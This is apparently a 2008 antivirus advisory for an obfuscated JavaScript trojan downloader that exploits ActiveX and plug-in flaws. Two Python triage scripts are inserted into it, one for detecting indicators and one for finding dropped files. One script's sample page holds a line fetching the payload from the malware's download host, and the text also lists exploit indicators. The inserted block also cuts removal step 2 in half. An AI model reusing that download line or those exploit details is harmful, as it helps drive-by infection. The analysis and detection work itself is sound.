Detection date: 13-05-2008
Threat type: TrojanDownloader
Platform: JS
This Trojan downloads another program from the Internet and launches it on the victim's computer without the user's knowledge or consent. It is an encoded (obfuscated) JavaScript embedded in an HTML document. It is 14147 bytes in size.
Behaviour:
When the infected page is opened in a web browser, the user is shown the following message:
Not Found
The requested URL / was not found on this server.
The Trojan then decodes itself and runs the decoded malicious script. The script exploits the following vulnerabilities:
1. A buffer overflow in the Live Picture Corporation "DXSurface.LivePicture.FlashPix.1" ActiveX control (DXTLIPI.DLL) when handling "SourceUrl()" (CVE-2007-4336);
2. A vulnerability in the Windows Media Player plug-in when handling an over-long 'src' parameter in an "embed" tag (MS06-006). This vulnerability is only present when the plug-in is loaded in browsers other than Internet Explorer;
3. A vulnerability in the "QuickTime.QuickTime" ActiveX object (CVE-2004-0431);
in order to download a file named "ldr.exe" from the following URL:
http://java62.com/load.php****
The downloaded file is 48640 bytes in size. Kaspersky Anti-Virus detects it as Backdoor.Win32.Agent.ich. It is saved to the Windows system directory as:
%System%\~.exe
and is then launched. The Trojan also uses the "Msxml2.XMLHTTP" ActiveX object and the objects with the following CLSIDs:
{BD96C556-65A3-11D0-983A-00C04FC29E30}
{BD96C556-65A3-11D0-983A-00C04FC29E36}
{AB9BCEDD-EC7E-47E1-9322-D4A210617116}
{0006F033-0000-0000-C000-000000000046}
{0006F03A-0000-0000-C000-000000000046}
{6E32070A-766D-4EE6-879C-DC1FA91D2FC3}
{6414512B-B978-451D-A0D8-FCFDF33E833C}
{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}
{06723E09-F4C2-43C8-8358-09FCD1DB0766}
{639F725F-1B2D-4831-A9FD-874847682010}
{BA018599-1DB3-44F9-83B4-461454C84BF8}
{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}
{E8CCCDDF-CA28-496B-B050-6C07C962476B}
to download a file named "ldr.exe" from the following URL:
http://java62.com/load.php?MSIE
It uses the "ADODB.Stream" ActiveX object to save this file under the name:
c:\sys.exe
with four random characters appended after "sys", for example:
syskmtz.exe
syskqoq.exe
The downloaded file is then launched.
Removal instructions
If your computer does not have an antivirus program that updates itself automatically, or has no antivirus solution at all, follow these steps to remove the malicious program:
1. Delete the original Trojan file (its location depends on how it first got onto the victim's computer).
2. Delete the following files:
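The behaviour above gives a fixed set of indicators for the decoded script: the ActiveX ProgIDs it instantiates, the CLSIDs it references, the download URL, and an over-long 'src' in an "embed" tag for MS06-006. The following triage script is an added example, not code from the advisory or from Kaspersky; it scans page content for those indicators and scores them. The sample page it runs over is constructed for the demo (it only names the objects, it is not the real malicious page), the 1024-byte 'src' threshold and the score cut-off of 2 are assumptions for triage, and because the real page wraps the script in an encoding layer, run this over the decoded script (for example a proxy or browser capture of the decoded layer), not the raw obfuscated HTML.

```python
"""Static triage for the JS TrojanDownloader described in this advisory.

Added example, not code from the advisory. Indicator strings are taken from
the advisory text; SAMPLE_PAGE is constructed for the demo.
"""
import re

# ActiveX ProgIDs the decoded script instantiates (from the advisory).
PROGIDS = [
    "DXSurface.LivePicture.FlashPix.1",  # CVE-2007-4336, DXTLIPI.DLL
    "QuickTime.QuickTime",               # CVE-2004-0431
    "Msxml2.XMLHTTP",                    # fetches ldr.exe
    "ADODB.Stream",                      # writes the payload to disk
]

# CLSIDs listed in the advisory.
CLSIDS = [
    "BD96C556-65A3-11D0-983A-00C04FC29E30",
    "BD96C556-65A3-11D0-983A-00C04FC29E36",
    "AB9BCEDD-EC7E-47E1-9322-D4A210617116",
    "0006F033-0000-0000-C000-000000000046",
    "0006F03A-0000-0000-C000-000000000046",
    "6E32070A-766D-4EE6-879C-DC1FA91D2FC3",
    "6414512B-B978-451D-A0D8-FCFDF33E833C",
    "7F5B7F63-F06F-4331-8A26-339E03C0AE3D",
    "06723E09-F4C2-43C8-8358-09FCD1DB0766",
    "639F725F-1B2D-4831-A9FD-874847682010",
    "BA018599-1DB3-44F9-83B4-461454C84BF8",
    "D0C07D56-7C69-43F1-B4A0-25F5A11FAB19",
    "E8CCCDDF-CA28-496B-B050-6C07C962476B",
]

# Download URL from the advisory (query string varies, so match the prefix).
URL_PATTERN = re.compile(r"https?://java62\.com/load\.php[^\s'\"<>]*", re.I)

# MS06-006: over-long 'src' in an <embed> for the WMP plug-in.
# The 1024-byte threshold is an assumption for triage, not a value from the advisory.
EMBED_SRC = re.compile(r"<embed[^>]*\bsrc\s*=\s*['\"]([^'\"]{1024,})['\"]", re.I)

# Constructed sample page for the demo; it only names the objects.
SAMPLE_PAGE = (
    "<html><body>Not Found<br>The requested URL / was not found on this server."
    "<script>"
    "var x = new ActiveXObject('Msxml2.XMLHTTP');"
    "x.open('GET', 'http://java62.com/load.php?MSIE', false); x.send();"
    "var s = new ActiveXObject('ADODB.Stream');"
    "</script>"
    "<object classid='clsid:BD96C556-65A3-11D0-983A-00C04FC29E36'></object>"
    "<embed src='" + "A" * 1500 + "' type='application/x-mplayer2'></embed>"
    "</body></html>"
)


def scan(content: str) -> dict:
    """Return the indicators found in decoded page content, plus a score."""
    lower = content.lower()
    hits = {
        "progids": [p for p in PROGIDS if p.lower() in lower],
        "clsids": [c for c in CLSIDS if c.lower() in lower],
        "urls": URL_PATTERN.findall(content),
        "long_embed_src": EMBED_SRC.search(content) is not None,
    }
    hits["score"] = (len(hits["progids"]) + len(hits["clsids"])
                     + len(hits["urls"]) + int(hits["long_embed_src"]))
    return hits


def is_suspicious(content: str, threshold: int = 2) -> bool:
    """Two or more independent indicators is the (assumed) cut-off."""
    return scan(content)["score"] >= threshold


if __name__ == "__main__":
    for key, value in scan(SAMPLE_PAGE).items():
        print(f"{key}: {value}")
    print("suspicious:", is_suspicious(SAMPLE_PAGE))
```

A single hit on "Msxml2.XMLHTTP" or "ADODB.Stream" is common in legitimate 2008-era intranet pages, which is why the verdict needs at least two independent indicators; the CLSIDs and the java62.com URL are the high-confidence ones.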
%System%\~.exe
c:\sys.exe
3. Disable the vulnerable ActiveX objects (for example by setting the kill bit for their CLSIDs).
4. Install the following security update:
http://www.microsoft.com/technet/security/Bulletin/MS06-006.mspx
5. Install the latest version of QuickTime.
6. Update the antivirus databases and run a full scan of the computer.
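Step 2 of the removal procedure names a fixed file in the system directory (%System%\~.exe) and a file in the root of C: whose name is "sys" plus four random characters (sys.exe, syskmtz.exe, syskqoq.exe). The following script is an added example, not part of the advisory; it locates candidates matching those names and deletes nothing, so each hit can be confirmed (hash, AV verdict) before removal. It assumes the random characters may be letters or digits (the advisory's examples show only lowercase letters), takes the directories as parameters so it can be exercised on a constructed tree, and resolves %System% from the SystemRoot environment variable when run on a live machine.

```python
"""Locate the dropped files named in this advisory's removal step 2.

Added example, not part of the advisory. Reports candidates only; deletes nothing.
"""
import os
import re
import tempfile
from pathlib import Path

# %System%\~.exe: a literal name, no pattern needed.
SYSTEM_DROP_NAME = "~.exe"

# c:\sys.exe, or "sys" plus four random characters (syskmtz.exe, syskqoq.exe).
# Allowing digits as well as letters is an assumption; the advisory shows letters.
ROOT_DROP_PATTERN = re.compile(r"^sys(?:[a-z0-9]{4})?\.exe$", re.I)


def find_dropped_files(system_dir, root_dir) -> list:
    """Return full paths of files matching the advisory's dropped-file names."""
    hits = []
    sys_candidate = Path(system_dir) / SYSTEM_DROP_NAME
    if sys_candidate.is_file():
        hits.append(str(sys_candidate))
    root = Path(root_dir)
    if root.is_dir():
        for entry in sorted(root.iterdir()):
            # Any 7-character "sys*.exe" matches, so confirm hits before deleting.
            if entry.is_file() and ROOT_DROP_PATTERN.match(entry.name):
                hits.append(str(entry))
    return hits


def demo() -> list:
    """Build a constructed directory tree and return the basenames found."""
    with tempfile.TemporaryDirectory() as base:
        system_dir = os.path.join(base, "System32")
        root_dir = os.path.join(base, "C")
        os.makedirs(system_dir)
        os.makedirs(root_dir)
        # Constructed sample files: two decoys that must not match.
        for name in ("~.exe", "kernel32.dll"):
            open(os.path.join(system_dir, name), "wb").close()
        for name in ("sys.exe", "syskmtz.exe", "syskqoq.exe",
                     "sysconfig.exe", "notepad.exe"):
            open(os.path.join(root_dir, name), "wb").close()
        return [os.path.basename(p) for p in find_dropped_files(system_dir, root_dir)]


if __name__ == "__main__":
    # On a live Windows machine: %System% is <SystemRoot>\System32, root is C:\.
    system_root = os.environ.get("SystemRoot", r"C:\Windows")
    live_hits = find_dropped_files(os.path.join(system_root, "System32"), "C:\\")
    print("live candidates:", live_hits)
    print("demo tree:", demo())
```

Run it before step 2 rather than deleting by name from memory; a file such as c:\sysconfig.exe does not match, but any legitimate seven-character sys*.exe in the root would, so the list is a set of candidates, not a verdict.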